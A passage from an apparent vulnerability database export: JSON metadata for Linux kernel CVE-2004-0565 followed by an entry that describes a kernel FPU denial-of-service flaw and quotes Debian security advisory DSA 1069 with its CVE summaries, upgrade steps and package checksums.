        "db": "REDHAT",
        "id": "RHSA-2004:504",
        "trust": 0.6
      },
      {
        "db": "MANDRAKE",
        "id": "MDKSA-2004:066",
        "trust": 0.6
      },
      {
        "db": "MLIST",
        "id": "[OWL-USERS] 20040619 LINUX 2.4.26-OW2",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "33773",
        "trust": 0.2
      },
      {
        "db": "VULHUB",
        "id": "VHN-8995",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "46506",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "46508",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "46509",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-8995"
      },
      {
        "db": "BID",
        "id": "10687"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000211"
      },
      {
        "db": "PACKETSTORM",
        "id": "33773"
      },
      {
        "db": "PACKETSTORM",
        "id": "46506"
      },
      {
        "db": "PACKETSTORM",
        "id": "46508"
      },
      {
        "db": "PACKETSTORM",
        "id": "46509"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200412-044"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0565"
      }
    ]
  },
  "id": "VAR-200407-0196",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-8995"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-07-23T20:08:16.659000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "RHSA-2004:504",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2004-504.html"
      },
      {
        "title": "RHSA-2004:413",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2004-413.html"
      },
      {
        "title": "RHSA-2004:689",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2004-689.html"
      },
      {
        "title": "RHSA-2004:689",
        "trust": 0.8,
        "url": "http://www.jp.redhat.com/support/errata/rhsa/rhsa-2004-689j.html"
      },
      {
        "title": "RHSA-2004:504",
        "trust": 0.8,
        "url": "http://www.jp.redhat.com/support/errata/rhsa/rhsa-2004-504j.html"
      },
      {
        "title": "RHSA-2004:413",
        "trust": 0.8,
        "url": "http://www.jp.redhat.com/support/errata/rhsa/rhsa-2004-413j.html"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000211"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-Other",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2004-0565"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "http://www.securityfocus.com/bid/10687"
      },
      {
        "trust": 2.0,
        "url": "https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=124734"
      },
      {
        "trust": 1.7,
        "url": "http://www.debian.org/security/2006/dsa-1067"
      },
      {
        "trust": 1.7,
        "url": "http://www.debian.org/security/2006/dsa-1069"
      },
      {
        "trust": 1.7,
        "url": "http://www.debian.org/security/2006/dsa-1070"
      },
      {
        "trust": 1.7,
        "url": "http://www.debian.org/security/2006/dsa-1082"
      },
      {
        "trust": 1.7,
        "url": "http://www.mandriva.com/security/advisories?name=mdksa-2004:066"
      },
      {
        "trust": 1.7,
        "url": "http://archives.neohapsis.com/archives/linux/owl/2004-q2/0038.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.redhat.com/support/errata/rhsa-2004-504.html"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/20162"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/20163"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/20202"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/20338"
      },
      {
        "trust": 1.4,
        "url": "http://xforce.iss.net/xforce/xfdb/16644"
      },
      {
        "trust": 1.1,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a10714"
      },
      {
        "trust": 1.1,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/16644"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2004-0565"
      },
      {
        "trust": 0.8,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2004-0565"
      },
      {
        "trust": 0.8,
        "url": "http://www.securityfocus.com/bid/10783"
      },
      {
        "trust": 0.6,
        "url": "http://oval.mitre.org/repository/data/getdef?id=oval:org.mitre.oval:def:10714"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0565"
      },
      {
        "trust": 0.3,
        "url": "http://rhn.redhat.com/errata/rhsa-2004-504.html"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2005-0489"
      },
      {
        "trust": 0.3,
        "url": "http://www.debian.org/security/faq"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0394"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0427"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0554"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0447"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2005-0124"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2005-0001"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0997"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-1333"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2003-0984"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0949"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0883"
      },
      {
        "trust": 0.3,
        "url": "http://packages.debian.org/\u003cpkg\u003e"
      },
      {
        "trust": 0.3,
        "url": "http://security.debian.org/"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0685"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-1016"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2005-0528"
      },
      {
        "trust": 0.3,
        "url": "http://www.debian.org/security/"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-1017"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-1335"
      },
      {
        "trust": 0.2,
        "url": "http://secunia.com/"
      },
      {
        "trust": 0.2,
        "url": "http://lists.grok.org.uk/full-disclosure-charter.html"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.16/kernel-doc-2.4.16_2.4.16-1woody3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-netwinder/kernel-image-2.4.16-netwinder_20040419woody1.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-riscpc/kernel-image-2.4.16-riscpc_20040419woody1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.16/kernel-source-2.4.16_2.4.16-1woody3.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-lart/kernel-image-2.4.16-lart_20040419woody1.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.16/kernel-source-2.4.16_2.4.16.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-netwinder/kernel-image-2.4.16-netwinder_20040419woody1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-netwinder/kernel-headers-2.4.16_20040419woody1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.16/kernel-source-2.4.16_2.4.16-1woody3.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-riscpc/kernel-image-2.4.16-riscpc_20040419woody1.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.16/kernel-source-2.4.16_2.4.16-1woody3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-netwinder/kernel-image-2.4.16-netwinder_20040419woody1.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-riscpc/kernel-image-2.4.16-riscpc_20040419woody1.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-lart/kernel-image-2.4.16-lart_20040419woody1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-lart/kernel-image-2.4.16-lart_20040419woody1.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-image-2.4.19-r5k-ip22_2.4.19-0.020911.1.woody5_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody5.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody3.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-doc-2.4.19_2.4.19-4.woody3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-sparc-2.4_26woody1.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-2.4.19-sun4u_26woody1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/mips-tools_2.4.19-0.020911.1.woody5_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-sparc-2.4_26woody1.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody5_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody3.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-image-2.4.19-r4k-ip22_2.4.19-0.020911.1.woody5_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-headers-2.4.18-sparc_22woody1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-2.4.18-sun4u-smp_22woody1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-headers-2.4.19_2.4.19-0.020911.1.woody5_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-2.4.18-sun4u_22woody1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody5.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-headers-2.4.19-sparc_26woody1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-2.4.19-sun4u-smp_26woody1_sparc.deb"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-8995"
      },
      {
        "db": "BID",
        "id": "10687"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000211"
      },
      {
        "db": "PACKETSTORM",
        "id": "33773"
      },
      {
        "db": "PACKETSTORM",
        "id": "46506"
      },
      {
        "db": "PACKETSTORM",
        "id": "46508"
      },
      {
        "db": "PACKETSTORM",
        "id": "46509"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200412-044"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0565"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-8995"
      },
      {
        "db": "BID",
        "id": "10687"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000211"
      },
      {
        "db": "PACKETSTORM",
        "id": "33773"
      },
      {
        "db": "PACKETSTORM",
        "id": "46506"
      },
      {
        "db": "PACKETSTORM",
        "id": "46508"
      },
      {
        "db": "PACKETSTORM",
        "id": "46509"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200412-044"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0565"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2004-12-06T00:00:00",
        "db": "VULHUB",
        "id": "VHN-8995"
      },
      {
        "date": "2004-07-09T00:00:00",
        "db": "BID",
        "id": "10687"
      },
      {
        "date": "2007-04-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2004-000211"
      },
      {
        "date": "2004-07-12T17:36:00",
        "db": "PACKETSTORM",
        "id": "33773"
      },
      {
        "date": "2006-05-22T06:29:12",
        "db": "PACKETSTORM",
        "id": "46506"
      },
      {
        "date": "2006-05-22T06:33:40",
        "db": "PACKETSTORM",
        "id": "46508"
      },
      {
        "date": "2006-05-22T06:34:27",
        "db": "PACKETSTORM",
        "id": "46509"
      },
      {
        "date": "2004-07-09T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200412-044"
      },
      {
        "date": "2004-12-06T05:00:00",
        "db": "NVD",
        "id": "CVE-2004-0565"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-11T00:00:00",
        "db": "VULHUB",
        "id": "VHN-8995"
      },
      {
        "date": "2007-01-17T21:30:00",
        "db": "BID",
        "id": "10687"
      },
      {
        "date": "2007-04-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2004-000211"
      },
      {
        "date": "2005-10-20T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200412-044"
      },
      {
        "date": "2017-10-11T01:29:28.480000",
        "db": "NVD",
        "id": "CVE-2004-0565"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "BID",
        "id": "10687"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200412-044"
      }
    ],
    "trust": 0.9
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux Kernel In  FPH Vulnerabilities that do not check the process that owns",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000211"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Design Error",
    "sources": [
      {
        "db": "BID",
        "id": "10687"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200412-044"
      }
    ],
    "trust": 0.9
  }
}

var-200406-0158
Vulnerability from variot

Linux kernel 2.4.x and 2.6.x for x86 allows local users to cause a denial of service (system crash), possibly via an infinite loop that triggers a signal handler with a certain sequence of fsave and frstor instructions, as originally demonstrated using a "crash.c" program. The Linux kernel contains a denial-of-service vulnerability that allows local users to disable affected hosts. Linux Kernel Stores the process state of the floating point unit / Used to restore FSAVE/FRSTOR There are deficiencies in the handling of instructions. This issue is due to a design error that causes the kernel to fail to properly handle floating-point exceptions. This issue may be leveraged by an attacker to cause the affected system to crash, denying service to legitimate users. Although only select Linux kernels are reported to be affected, it is likely that various other versions are vulnerable as well. These issues were found during a recent audit of the Linux kernel source. The following drivers are reportedly affected by these issues: aironet asus_acpi decnet mpu401 msnd pss These issues may reportedly allow attackers to access kernel memory or gain escalated privileges on the affected computer. Local attackers can exploit these vulnerabilities to elevate privileges or conduct denial-of-service attacks on the system. The affected device drivers are: aironet, asus_acpi, decnet, mpu401, msnd, and pss. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1


Debian Security Advisory DSA 1069-1 security@debian.org http://www.debian.org/security/ Martin Schulze, Dann Frazier May 20th, 2006 http://www.debian.org/security/faq


Package : kernel-source-2.4.18,kernel-image-2.4.18-1-alpha,kernel-image-2.4.18-1-i386,kernel-image-2.4.18-hppa,kernel-image-2.4.18-powerpc-xfs,kernel-patch-2.4.18-powerpc,kernel-patch-benh Vulnerability : several Problem-Type : local/remote Debian-specific: no CVE IDs : CVE-2004-0427 CVE-2005-0489 CVE-2004-0394 CVE-2004-0447 CVE-2004-0554 CVE-2004-0565 CVE-2004-0685 CVE-2005-0001 CVE-2004-0883 CVE-2004-0949 CVE-2004-1016 CVE-2004-1333 CVE-2004-0997 CVE-2004-1335 CVE-2004-1017 CVE-2005-0124 CVE-2005-0528 CVE-2003-0984 CVE-2004-1070 CVE-2004-1071 CVE-2004-1072 CVE-2004-1073 CVE-2004-1074 CVE-2004-0138 CVE-2004-1068 CVE-2004-1234 CVE-2005-0003 CVE-2004-1235 CVE-2005-0504 CVE-2005-0384 CVE-2005-0135

Several local and remote vulnerabilities have been discovered in the Linux kernel that may lead to a denial of service or the execution of arbitrary code.

CVE-2004-0394

 A buffer overflow in the panic handling code has been found.

CVE-2004-0565

 An information leak in the context switch code has been found on
 the IA64 architecture.

CVE-2004-0685

 Unsafe use of copy_to_user in USB drivers may disclose sensitive
 information.

CVE-2005-0001

 A race condition in the i386 page fault handler may allow privilege
 escalation.

CVE-2004-0883

 Multiple vulnerabilities in the SMB filesystem code may allow denial
 of service of information disclosure.

CVE-2004-0949

 An information leak discovered in the SMB filesystem code.

CVE-2004-0997

 A local privilege escalation in the MIPS assembly code has been found.

CVE-2004-1335

 A memory leak in the ip_options_get() function may lead to denial of
 service.

CVE-2004-1017

 Multiple overflows exist in the io_edgeport driver which might be usable
 as a denial of service attack vector.

CVE-2005-0124

 Bryan Fulton reported a bounds checking bug in the coda_pioctl function
 which may allow local users to execute arbitrary code or trigger a denial
 of service attack.

CVE-2005-0528

 A local privilege escalation in the mremap function has been found

CVE-2003-0984

 Inproper initialization of the RTC may disclose information.

CVE-2004-1070

 Insufficient input sanitising in the load_elf_binary() function may
 lead to privilege escalation.

CVE-2004-1071

 Incorrect error handling in the binfmt_elf loader may lead to privilege
 escalation.

CVE-2004-1072

 A buffer overflow in the binfmt_elf loader may lead to privilege
 escalation or denial of service.

CVE-2004-1073

 The open_exec function may disclose information.

CVE-2004-1074

 The binfmt code is vulnerable to denial of service through malformed
 a.out binaries.

CVE-2004-1068

 A programming error in the unix_dgram_recvmsg() function may lead to
 privilege escalation.

CVE-2004-1234

 The ELF loader is vulnerable to denial of service through malformed
 binaries.

CVE-2005-0003

 Crafted ELF binaries may lead to privilege escalation, due to 
 insufficient checking of overlapping memory regions.

CVE-2004-1235

 A race condition in the load_elf_library() and binfmt_aout() functions
 may allow privilege escalation.

CVE-2005-0504

 An integer overflow in the Moxa driver may lead to privilege escalation.

The following matrix explains which kernel version for which architecture fix the problems mentioned above:

                                 Debian 3.0 (woody)
 Source                          2.4.18-14.4
 Alpha architecture              2.4.18-15woody1
 Intel IA-32 architecture        2.4.18-13.2
 HP Precision architecture       62.4 
 PowerPC architecture            2.4.18-1woody6
 PowerPC architecture/XFS        20020329woody1            
 PowerPC architecture/benh       20020304woody1
 Sun Sparc architecture          22woody1

We recommend that you upgrade your kernel package immediately and reboot the machine.

Upgrade Instructions


wget url will fetch the file for you dpkg -i file.deb will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update will update the internal database apt-get dist-upgrade will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody


These files will probably be moved into the stable distribution on its next update.


For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce@lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.3 (GNU/Linux)

iD8DBQFEb9YGXm3vHE4uyloRAkhXAJ0e1RmUxVZSbQICFa/j07oKPfWRVwCeMrhj wYGegwosZg6xi3oI77opLQY= =eu/T -----END PGP SIGNATURE-----


Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ .

Debian GNU/Linux 3.0 alias woody


Source archives:

http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-sparc-2.4_26woody1.dsc
  Size/MD5 checksum:      692 27f44a0eec5837b0b01d26c6cff392be
http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-sparc-2.4_26woody1.tar.gz
  Size/MD5 checksum:    27768 6c719a6343c9ea0dad44a736b3842504
http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody5.dsc
  Size/MD5 checksum:      792 d7c89c90fad77944ca1c5a18327f31dd
http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody5.tar.gz
  Size/MD5 checksum:  1013866 21b4b677a7a319442c8fe8a4c72eb4c2
http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody3.dsc
  Size/MD5 checksum:      672 4c353db091e8edc4395e46cf8d39ec42
http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody3.diff.gz
  Size/MD5 checksum:    71071 7012adde9ba9a573e1be66f0d258721a
http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19.orig.tar.gz
  Size/MD5 checksum: 32000211 237896fbb45ae652cc9c5cecc9b746da

Architecture independent components:

http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-headers-2.4.18-sparc_22woody1_all.deb
  Size/MD5 checksum:  1521850 75d23c7c54094b1d25d3b708fd644407
http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-headers-2.4.19-sparc_26woody1_all.deb
  Size/MD5 checksum:  1547874 c6881b25e3a5967e0f6f9c351fb88962
http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody5_all.deb
  Size/MD5 checksum:  1014564 0e89364c2816f5f4519256a8ea367ab6
http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-doc-2.4.19_2.4.19-4.woody3_all.deb
  Size/MD5 checksum:  1785490 c66cef9e87d9a89caeee02af31e3c96d
http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody3_all.deb
  Size/MD5 checksum: 25902158 321403201a198371fd55c9b8ac4583f7

Sun Sparc architecture:

http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-2.4.18-sun4u_22woody1_sparc.deb
  Size/MD5 checksum:  3923058 db7bbd997410667bec4ac713d81d60ea
http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-2.4.18-sun4u-smp_22woody1_sparc.deb
  Size/MD5 checksum:  4044796 106fcb86485531d96b4fdada61b71405
http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-2.4.19-sun4u_26woody1_sparc.deb
  Size/MD5 checksum:  3831424 347b0c290989f0cc99f3b336c156f61d
http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-2.4.19-sun4u-smp_26woody1_sparc.deb
  Size/MD5 checksum:  3952220 f7dd8326c0ae0b0dee7c46e24023d0a2

Big endian MIPS architecture:

http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-headers-2.4.19_2.4.19-0.020911.1.woody5_mips.deb
  Size/MD5 checksum:  3890804 7348a8cd3961190aa2a19f562c96fe2f
http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-image-2.4.19-r4k-ip22_2.4.19-0.020911.1.woody5_mips.deb
  Size/MD5 checksum:  2080618 d52d00e7097ae0c8f4ccb6f34656361d
http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-image-2.4.19-r5k-ip22_2.4.19-0.020911.1.woody5_mips.deb
  Size/MD5 checksum:  2080830 db7141d3c0d86a43659176f974599cc2
http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/mips-tools_2.4.19-0.020911.1.woody5_mips.deb
  Size/MD5 checksum:    15816 c31e3b72d6eac6f3f99f75ea838e0bf9

These files will probably be moved into the stable distribution on its next update

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200406-0158",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "linux",
        "scope": "eq",
        "trust": 2.2,
        "vendor": "suse",
